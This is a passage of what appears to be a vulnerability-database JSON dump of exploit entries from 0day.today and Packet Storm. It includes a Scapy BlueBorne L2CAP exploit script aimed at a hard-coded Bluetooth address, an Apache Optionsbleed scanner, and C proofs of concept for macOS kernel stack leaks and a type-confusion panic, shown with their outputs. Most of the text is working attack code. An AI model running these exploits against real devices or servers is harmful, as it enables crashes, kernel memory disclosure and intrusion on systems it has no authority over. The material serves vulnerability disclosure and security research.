ByteField(\"length25\",0),\r\n LEShortField(\"option25\",0),\r\n ByteField(\"type26\",0),\r\n ByteField(\"length26\",0),\r\n LEShortField(\"option26\",0),\r\n ByteField(\"type27\",0),\r\n ByteField(\"length27\",0),\r\n LEShortField(\"option27\",0),\r\n ByteField(\"type28\",0),\r\n ByteField(\"length28\",0),\r\n LEShortField(\"option28\",0),\r\n ByteField(\"type29\",0),\r\n ByteField(\"length29\",0),\r\n LEShortField(\"option29\",0),\r\n ByteField(\"type30\",0),\r\n ByteField(\"length30\",0),\r\n LEShortField(\"option30\",0),\r\n ByteField(\"type31\",0),\r\n ByteField(\"length31\",0),\r\n LEShortField(\"option31\",0),\r\n ByteField(\"type32\",0),\r\n ByteField(\"length32\",0),\r\n LEShortField(\"option32\",0),\r\n ByteField(\"type33\",0),\r\n ByteField(\"length33\",0),\r\n LEShortField(\"option33\",0),\r\n ByteField(\"type34\",0),\r\n ByteField(\"length34\",0),\r\n LEShortField(\"option34\",0),\r\n ByteField(\"type35\",0),\r\n ByteField(\"length35\",0),\r\n LEShortField(\"option35\",0),\r\n ByteField(\"type36\",0),\r\n ByteField(\"length36\",0),\r\n LEShortField(\"option36\",0),\r\n ByteField(\"type37\",0),\r\n ByteField(\"length37\",0),\r\n LEShortField(\"option37\",0),\r\n ByteField(\"type38\",0),\r\n ByteField(\"length38\",0),\r\n LEShortField(\"option38\",0),\r\n ByteField(\"type39\",0),\r\n ByteField(\"length39\",0),\r\n LEShortField(\"option39\",0),\r\n ByteField(\"type40\",0),\r\n ByteField(\"length40\",0),\r\n LEShortField(\"option40\",0),\r\n ByteField(\"type41\",0),\r\n ByteField(\"length41\",0),\r\n LEShortField(\"option41\",0),\r\n ByteField(\"type42\",0),\r\n ByteField(\"length42\",0),\r\n LEShortField(\"option42\",0),\r\n ByteField(\"type43\",0),\r\n ByteField(\"length43\",0),\r\n LEShortField(\"option43\",0),\r\n ByteField(\"type44\",0),\r\n ByteField(\"length44\",0),\r\n LEShortField(\"option44\",0),\r\n ByteField(\"type45\",0),\r\n ByteField(\"length45\",0),\r\n LEShortField(\"option45\",0),\r\n ByteField(\"type46\",0),\r\n ByteField(\"length46\",0),\r\n LEShortField(\"option46\",0),\r\n ByteField(\"type47\",0),\r\n ByteField(\"length47\",0),\r\n LEShortField(\"option47\",0),\r\n ByteField(\"type48\",0),\r\n ByteField(\"length48\",0),\r\n LEShortField(\"option48\",0),\r\n ByteField(\"type49\",0),\r\n ByteField(\"length49\",0),\r\n LEShortField(\"option49\",0),\r\n ByteField(\"type50\",0),\r\n ByteField(\"length50\",0),\r\n LEShortField(\"option50\",0),\r\n ByteField(\"type51\",0),\r\n ByteField(\"length51\",0),\r\n LEShortField(\"option51\",0),\r\n ByteField(\"type52\",0),\r\n ByteField(\"length52\",0),\r\n LEShortField(\"option52\",0),\r\n ByteField(\"type53\",0),\r\n ByteField(\"length53\",0),\r\n LEShortField(\"option53\",0),\r\n ByteField(\"type54\",0),\r\n ByteField(\"length54\",0),\r\n LEShortField(\"option54\",0),\r\n ByteField(\"type55\",0),\r\n ByteField(\"length55\",0),\r\n LEShortField(\"option55\",0),\r\n ByteField(\"type56\",0),\r\n ByteField(\"length56\",0),\r\n LEShortField(\"option56\",0),\r\n ByteField(\"type57\",0),\r\n ByteField(\"length57\",0),\r\n LEShortField(\"option57\",0),\r\n ByteField(\"type58\",0),\r\n ByteField(\"length58\",0),\r\n LEShortField(\"option58\",0),\r\n ByteField(\"type59\",0),\r\n ByteField(\"length59\",0),\r\n LEShortField(\"option59\",0),\r\n ByteField(\"type60\",0),\r\n ByteField(\"length60\",0),\r\n LEShortField(\"option60\",0),\r\n ByteField(\"type61\",0),\r\n ByteField(\"length61\",0),\r\n LEShortField(\"option61\",0),\r\n ByteField(\"type62\",0),\r\n ByteField(\"length62\",0),\r\n LEShortField(\"option62\",0),\r\n ByteField(\"type63\",0),\r\n ByteField(\"length63\",0),\r\n LEShortField(\"option63\",0),\r\n ByteField(\"type64\",0),\r\n ByteField(\"length64\",0),\r\n LEShortField(\"option64\",0),\r\n ByteField(\"type65\",0),\r\n ByteField(\"length65\",0),\r\n LEShortField(\"option65\",0),\r\n ByteField(\"type66\",0),\r\n ByteField(\"length66\",0),\r\n LEShortField(\"option66\",0),\r\n ByteField(\"type67\",0),\r\n ByteField(\"length67\",0),\r\n LEShortField(\"option67\",0),\r\n ByteField(\"type68\",0),\r\n ByteField(\"length68\",0),\r\n LEShortField(\"option68\",0),\r\n ByteField(\"type69\",0),\r\n ByteField(\"length69\",0),\r\n LEShortField(\"option69\",0),\r\n ]\r\n\r\n\r\n2) Exploit \r\n\r\n\r\nbluebornexploit.py\r\n------------------------\r\n\r\nfrom scapy.all import *\r\n\r\npkt = L2CAP_CmdHdr(code=4)/ L2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)\r\n\r\n\r\npkt1 = L2CAP_CmdHdr(code=5)/ L2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)\r\n\r\n\r\nbt = BluetoothL2CAPSocket(\"00:1A:7D:DA:71:13\")\r\n\r\nbt.send(pkt)\r\nbt.send(pkt1)\r\n\r\n\r\nbluetoothsrv.py\r\n--------------------\r\n\r\nfrom scapy.all import *\r\n\r\nbt = BluetoothL2CAPSocket(\"01:02:03:04:05:06\")\r\n\r\nbt.recv()\r\n\r\n\r\n\r\n\r\nDEMO:\r\n\r\nhttps://imgur.com/a/zcvLb\r\n\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/28593", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-09T19:58:35", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2018-01-12T00:00:00", "type": "zdt", "title": "macOS - process_policy Stack Leak Through Uninitialized Field Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7154"], "modified": "2018-01-12T00:00:00", "id": "1337DAY-ID-29460", "href": "https://0day.today/exploit/description/29460", "sourceData": "/*\r\nThe syscall\r\nprocess_policy(scope=PROC_POLICY_SCOPE_PROCESS, action=PROC_POLICY_ACTION_GET, policy=PROC_POLICY_RESOURCE_USAGE, policy_subtype=PROC_POLICY_RUSAGE_CPU, attrp=<userbuf>, target_pid=0, target_threadid=<ignored>)\r\ncauses 4 bytes of uninitialized kernel stack memory to be written to userspace.\r\n \r\nThe call graph looks as follows:\r\n \r\nprocess_policy\r\n handle_cpuuse\r\n proc_get_task_ruse_cpu\r\n task_get_cpuusage\r\n [writes scope=1/2/4/0]\r\n [always returns zero]\r\n [writes policyp if scope!=0]\r\n [always returns zero]\r\n copyout\r\n \r\n \r\nIf task_get_cpuusage() set `*scope=0` because none of the flags\r\nTASK_RUSECPU_FLAGS_PERTHR_LIMIT, TASK_RUSECPU_FLAGS_PROC_LIMIT and TASK_RUSECPU_FLAGS_DEADLINE are set in task->rusage_cpu_flags,\r\nproc_get_task_ruse_cpu() does not write anything into `*policyp`, meaning that `cpuattr.ppattr_cpu_attr` in\r\nhandle_cpuuse() remains uninitialized. task_get_cpuusage() and proc_get_task_ruse_cpu() always return zero,\r\nso handle_cpuuse() will copy `cpuattr`, including the unititialized `ppattr_cpu_attr` field, to userspace.\r\n \r\n \r\nTested on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:\r\n \r\n$ cat test.c\r\n*/\r\n \r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <inttypes.h>\r\n \r\nstruct proc_policy_cpuusage_attr {\r\n uint32_t ppattr_cpu_attr;\r\n uint32_t ppattr_cpu_percentage;\r\n uint64_t ppattr_cpu_attr_interval;\r\n uint64_t ppattr_cpu_attr_deadline;\r\n};\r\n \r\nvoid run(void) {\r\n int retval;\r\n struct proc_policy_cpuusage_attr attrs = {0,0,0,0};\r\n asm volatile(\r\n \"mov $0x02000143, %%rax\\n\\t\" // process_policy\r\n \"mov $1, %%rdi\\n\\t\" // PROC_POLICY_SCOPE_PROCESS\r\n \"mov $11, %%rsi\\n\\t\" // PROC_POLICY_ACTION_GET\r\n \"mov $4, %%rdx\\n\\t\" // PROC_POLICY_RESOURCE_USAGE\r\n \"mov $3, %%r10\\n\\t\" // PROC_POLICY_RUSAGE_CPU\r\n \"mov %[userptr], %%r8\\n\\t\"\r\n \"mov $0, %%r9\\n\\t\" // PID 0 (self)\r\n // target_threadid is unused\r\n \"syscall\\n\\t\"\r\n : //out\r\n \"=a\"(retval)\r\n : //in\r\n [userptr] \"r\"(&attrs)\r\n : //clobber\r\n \"cc\", \"memory\", \"rdi\", \"rsi\", \"rdx\", \"r10\", \"r8\", \"r9\"\r\n );\r\n printf(\"retval = %d\\n\", retval);\r\n printf(\"ppattr_cpu_attr = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_attr);\r\n printf(\"ppattr_cpu_percentage = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_percentage);\r\n printf(\"ppattr_cpu_attr_interval = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_interval);\r\n printf(\"ppattr_cpu_attr_deadline = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_deadline);\r\n}\r\n \r\nint main(void) {\r\n run();\r\n return 0;\r\n}\r\n \r\n/*\r\n$ gcc -Wall -o test test.c\r\n$ ./test\r\nretval = 0\r\nppattr_cpu_attr = 0x1a180ccb\r\nppattr_cpu_percentage = 0x0\r\nppattr_cpu_attr_interval = 0x0\r\nppattr_cpu_attr_deadline = 0x0\r\n \r\nThat looks like the lower half of a pointer or so.\r\n*/\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/29460", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-01T18:37:30", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2017-09-18T00:00:00", "type": "zdt", "title": "Apache - HTTP OPTIONS Memory Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "id": "1337DAY-ID-28573", "href": "https://0day.today/exploit/description/28573", "sourceData": "#!/usr/bin/env python3\r\n \r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00f6ck\r\n \r\nimport argparse\r\nimport urllib3\r\nimport re\r\n \r\n \r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n \r\n \r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n \r\ndup = []\r\n \r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n \r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n \r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass\n\n# 0day.today [2018-04-01] #", "sourceHref": "https://0day.today/exploit/28573", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2017-12-13T22:59:49", "description": "", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "packetstorm", "title": "macOS necp_get_socket_attributes so_pcb Type Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13855"], "modified": "2017-12-12T00:00:00", "id": "PACKETSTORM:145363", "href": "https://packetstormsecurity.com/files/145363/macOS-necp_get_socket_attributes-so_pcb-Type-Confusion.html", "sourceData": "`MacOS so_pcb type confusion in necp_get_socket_attributes \n \nCVE-2017-13855 \n \n \nWhen setsockopt() is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked. \nnecp_get_socket_attributes() unconditionally calls sotoinpcb(so): \n \nerrno_t \nnecp_get_socket_attributes(struct socket *so, struct sockopt *sopt) \n{ \nint error = 0; \nu_int8_t *buffer = NULL; \nu_int8_t *cursor = NULL; \nsize_t valsize = 0; \nstruct inpcb *inp = sotoinpcb(so); \n \nif (inp->inp_necp_attributes.inp_domain != NULL) { \nvalsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain); \n} \n[...] \n} \n \nsotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket): \n \n#define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb) \n \nIf necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`). \n \n \nTo trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots). \n \n============== \n#include <sys/types.h> \n#include <sys/un.h> \n#include <sys/socket.h> \n#include <err.h> \n#include <unistd.h> \n \n#define SO_NECP_ATTRIBUTES 0x1109 \n \nint main(void) { \nwhile (1) { \nint s = socket(AF_UNIX, SOCK_STREAM, 0); \nif (s == -1) \nerr(1, \"socket\"); \ngetsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL); \nclose(s); \n} \n} \n============== \n \nOn macOS 10.13 (17A405), this causes the following crash: \n \n============== \n*** Panic Report *** \npanic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers: \nCR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0 \nRAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc \nRSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8 \n<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">R8</a>: 0x0000000000000001, <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">R9</a>: 0xffffffff00000000, <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">R10</a>: 0x0000000000000000, <a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">R11</a>: 0x0000000000000246 \n<a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">R12</a>: 0xffffff80357cf7d0, <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">R13</a>: 0xffffff8032d69a08, <a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">R14</a>: 0xffffff8018de3ef0, <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">R15</a>: 0xffffff8032ac66a8 \nRFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010 \nFault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1 \n============== \n \nThis bug should be usable for disclosing kernel memory. \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \nFound by: jannh \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145363/GS20171212052017.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-13T22:59:48", "description": "", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "packetstorm", "title": "macOS getrusage Stack Leak", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "id": "PACKETSTORM:145364", "href": "https://packetstormsecurity.com/files/145364/macOS-getrusage-Stack-Leak.html", "sourceData": "`MacOS getrusage stack leak through struct padding \n \nCVE-2017-13869 \n \n \nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace: \n \nint \ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval) \n{ \nstruct rusage *rup, rubuf; \nstruct user64_rusage rubuf64; \nstruct user32_rusage rubuf32; \nsize_t retsize = sizeof(rubuf); /* default: 32 bits */ \ncaddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */ \nstruct timeval utime; \nstruct timeval stime; \n \n \nswitch (uap->who) { \ncase RUSAGE_SELF: \ncalcru(p, &utime, &stime, NULL); \nproc_lock(p); \nrup = &p->p_stats->p_ru; \nrup->ru_utime = utime; \nrup->ru_stime = stime; \n \nrubuf = *rup; \nproc_unlock(p); \n \nbreak; \n[...] \n} \nif (IS_64BIT_PROCESS(p)) { \nretsize = sizeof(rubuf64); \nretbuf = (caddr_t)&rubuf64; \nmunge_user64_rusage(&rubuf, &rubuf64); \n} else { \n[...] \n} \n \nreturn (copyout(retbuf, uap->rusage, retsize)); \n} \n \n`munge_user64_rusage()` performs the conversion by copying individual fields: \n \n__private_extern__ void \nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p) \n{ \n/* timeval changes size, so utime and stime need special handling */ \na_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec; \na_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec; \na_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec; \na_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec; \n[...] \n} \n \n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element: \n \n#define _STRUCT_USER64_TIMEVAL struct user64_timeval \n_STRUCT_USER64_TIMEVAL \n{ \nuser64_time_t tv_sec; /* seconds */ \n__int32_t tv_usec; /* and microseconds */ \n}; \n \nstruct user64_rusage { \nstruct user64_timeval ru_utime; /* user time used */ \nstruct user64_timeval ru_stime; /* system time used */ \nuser64_long_t ru_maxrss; /* max resident set size */ \n[...] \n}; \n \nThis padding is not initialized, but is copied to userspace. \n \n \nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0. \n \n \nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers. \nThe returned data seems to come from the previous syscall: \n \n$ cat test.c \n#include <sys/resource.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <fcntl.h> \n#include <unistd.h> \n \nvoid do_leak(void) { \nstatic struct rusage ru; \ngetrusage(RUSAGE_SELF, &ru); \nstatic unsigned int leak1, leak2; \nmemcpy(&leak1, ((char*)&ru)+12, 4); \nmemcpy(&leak1, ((char*)&ru)+28, 4); \nprintf(\"leak1: 0x%08x\\n\", leak1); \nprintf(\"leak2: 0x%08x\\n\", leak2); \n} \n \nint main(void) { \ndo_leak(); \ndo_leak(); \ndo_leak(); \nint fd = open(\"/dev/null\", O_RDONLY); \ndo_leak(); \nint dummy; \nread(fd, &dummy, 4); \ndo_leak(); \nreturn 0; \n} \n$ gcc -o test test.c && ./test \nleak1: 0x00000000 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff81 \nleak2: 0x00000000 \n \n \nHowever, I believe that this can also be used to disclose kernel heap memory. \nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack \nwithout zeroing it, so the new stack contains data from previous heap allocations. \nThe following testcase, when run after repeatedly reading a wordlist into memory, \nleaks some non-pointer data that seems to come from the wordlist: \n \n$ cat forktest.c \n#include <sys/resource.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <fcntl.h> \n#include <unistd.h> \n \nvoid do_leak(void) { \nstatic struct rusage ru; \ngetrusage(RUSAGE_SELF, &ru); \nstatic unsigned int leak1, leak2; \nmemcpy(&leak1, ((char*)&ru)+12, 4); \nmemcpy(&leak1, ((char*)&ru)+28, 4); \nchar str[1000]; \nif (leak1 != 0) { \nsprintf(str, \"leak1: 0x%08x\\n\", leak1); \nwrite(1, str, strlen(str)); \n} \nif (leak2 != 0) { \nsprintf(str, \"leak2: 0x%08x\\n\", leak2); \nwrite(1, str, strlen(str)); \n} \n} \n \nvoid leak_in_child(void) { \nint res_pid, res2; \nasm volatile( \n\"mov $0x02000002, %%rax\\n\\t\" \n\"syscall\\n\\t\" \n: \"=a\"(res_pid), \"=d\"(res2) \n: \n: \"cc\", \"memory\", \"rcx\", \"<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>\" \n); \n//write(1, \"postfork\\n\", 9); \nif (res2 == 1) { \n//write(1, \"child\\n\", 6); \ndo_leak(); \nchar dummy; \nread(0, &dummy, 1); \nasm volatile( \n\"mov $0x02000001, %rax\\n\\t\" \n\"mov $0, %rdi\\n\\t\" \n\"syscall\\n\\t\" \n); \n} \n//printf(\"fork=%d:%d\\n\", res_pid, res2); \nint wait_res; \n//wait(&wait_res); \n} \n \nint main(void) { \nfor(int i=0; i<1000; i++) { \nleak_in_child(); \n} \n} \n$ gcc -o forktest forktest.c && ./forktest \nleak1: 0x1b3b1320 \nleak1: 0x00007f00 \nleak1: 0x65686375 \nleak1: 0x410a2d63 \nleak1: 0x8162ced5 \nleak1: 0x65736168 \nleak1: 0x0000042b \n \nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist. \n \n \nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack. \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \nFound by: jannh \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145364/GS20171212052204.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-13T00:26:55", "description": "", "cvss3": {}, "published": "2018-01-12T00:00:00", "type": "packetstorm", "title": "macOS process_policy Stack Leak", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7154"], "modified": "2018-01-12T00:00:00", "id": "PACKETSTORM:145876", "href": "https://packetstormsecurity.com/files/145876/macOS-process_policy-Stack-Leak.html", "sourceData": "`MacOS process_policy stack leak through uninitialized field \n \nCVE-2017-7154 \n \n \nThe syscall \nprocess_policy(scope=PROC_POLICY_SCOPE_PROCESS, action=PROC_POLICY_ACTION_GET, policy=PROC_POLICY_RESOURCE_USAGE, policy_subtype=PROC_POLICY_RUSAGE_CPU, attrp=<userbuf>, target_pid=0, target_threadid=<ignored>) \ncauses 4 bytes of uninitialized kernel stack memory to be written to userspace. \n \nThe call graph looks as follows: \n \nprocess_policy \nhandle_cpuuse \nproc_get_task_ruse_cpu \ntask_get_cpuusage \n[writes scope=1/2/4/0] \n[always returns zero] \n[writes policyp if scope!=0] \n[always returns zero] \ncopyout \n \n \nIf task_get_cpuusage() set `*scope=0` because none of the flags \nTASK_RUSECPU_FLAGS_PERTHR_LIMIT, TASK_RUSECPU_FLAGS_PROC_LIMIT and TASK_RUSECPU_FLAGS_DEADLINE are set in task->rusage_cpu_flags, \nproc_get_task_ruse_cpu() does not write anything into `*policyp`, meaning that `cpuattr.ppattr_cpu_attr` in \nhandle_cpuuse() remains uninitialized. task_get_cpuusage() and proc_get_task_ruse_cpu() always return zero, \nso handle_cpuuse() will copy `cpuattr`, including the unititialized `ppattr_cpu_attr` field, to userspace. \n \n \nTested on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0: \n \n$ cat test.c \n#include <stdint.h> \n#include <stdio.h> \n#include <inttypes.h> \n \nstruct proc_policy_cpuusage_attr { \nuint32_t ppattr_cpu_attr; \nuint32_t ppattr_cpu_percentage; \nuint64_t ppattr_cpu_attr_interval; \nuint64_t ppattr_cpu_attr_deadline; \n}; \n \nvoid run(void) { \nint retval; \nstruct proc_policy_cpuusage_attr attrs = {0,0,0,0}; \nasm volatile( \n\"mov $0x02000143, %%rax\\n\\t\" // process_policy \n\"mov $1, %%rdi\\n\\t\" // PROC_POLICY_SCOPE_PROCESS \n\"mov $11, %%rsi\\n\\t\" // PROC_POLICY_ACTION_GET \n\"mov $4, %%rdx\\n\\t\" // PROC_POLICY_RESOURCE_USAGE \n\"mov $3, %%<a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>\\n\\t\" // PROC_POLICY_RUSAGE_CPU \n\"mov %[userptr], %%<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>\\n\\t\" \n\"mov $0, %%<a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>\\n\\t\" // PID 0 (self) \n// target_threadid is unused \n\"syscall\\n\\t\" \n: //out \n\"=a\"(retval) \n: //in \n[userptr] \"r\"(&attrs) \n: //clobber \n\"cc\", \"memory\", \"rdi\", \"rsi\", \"rdx\", 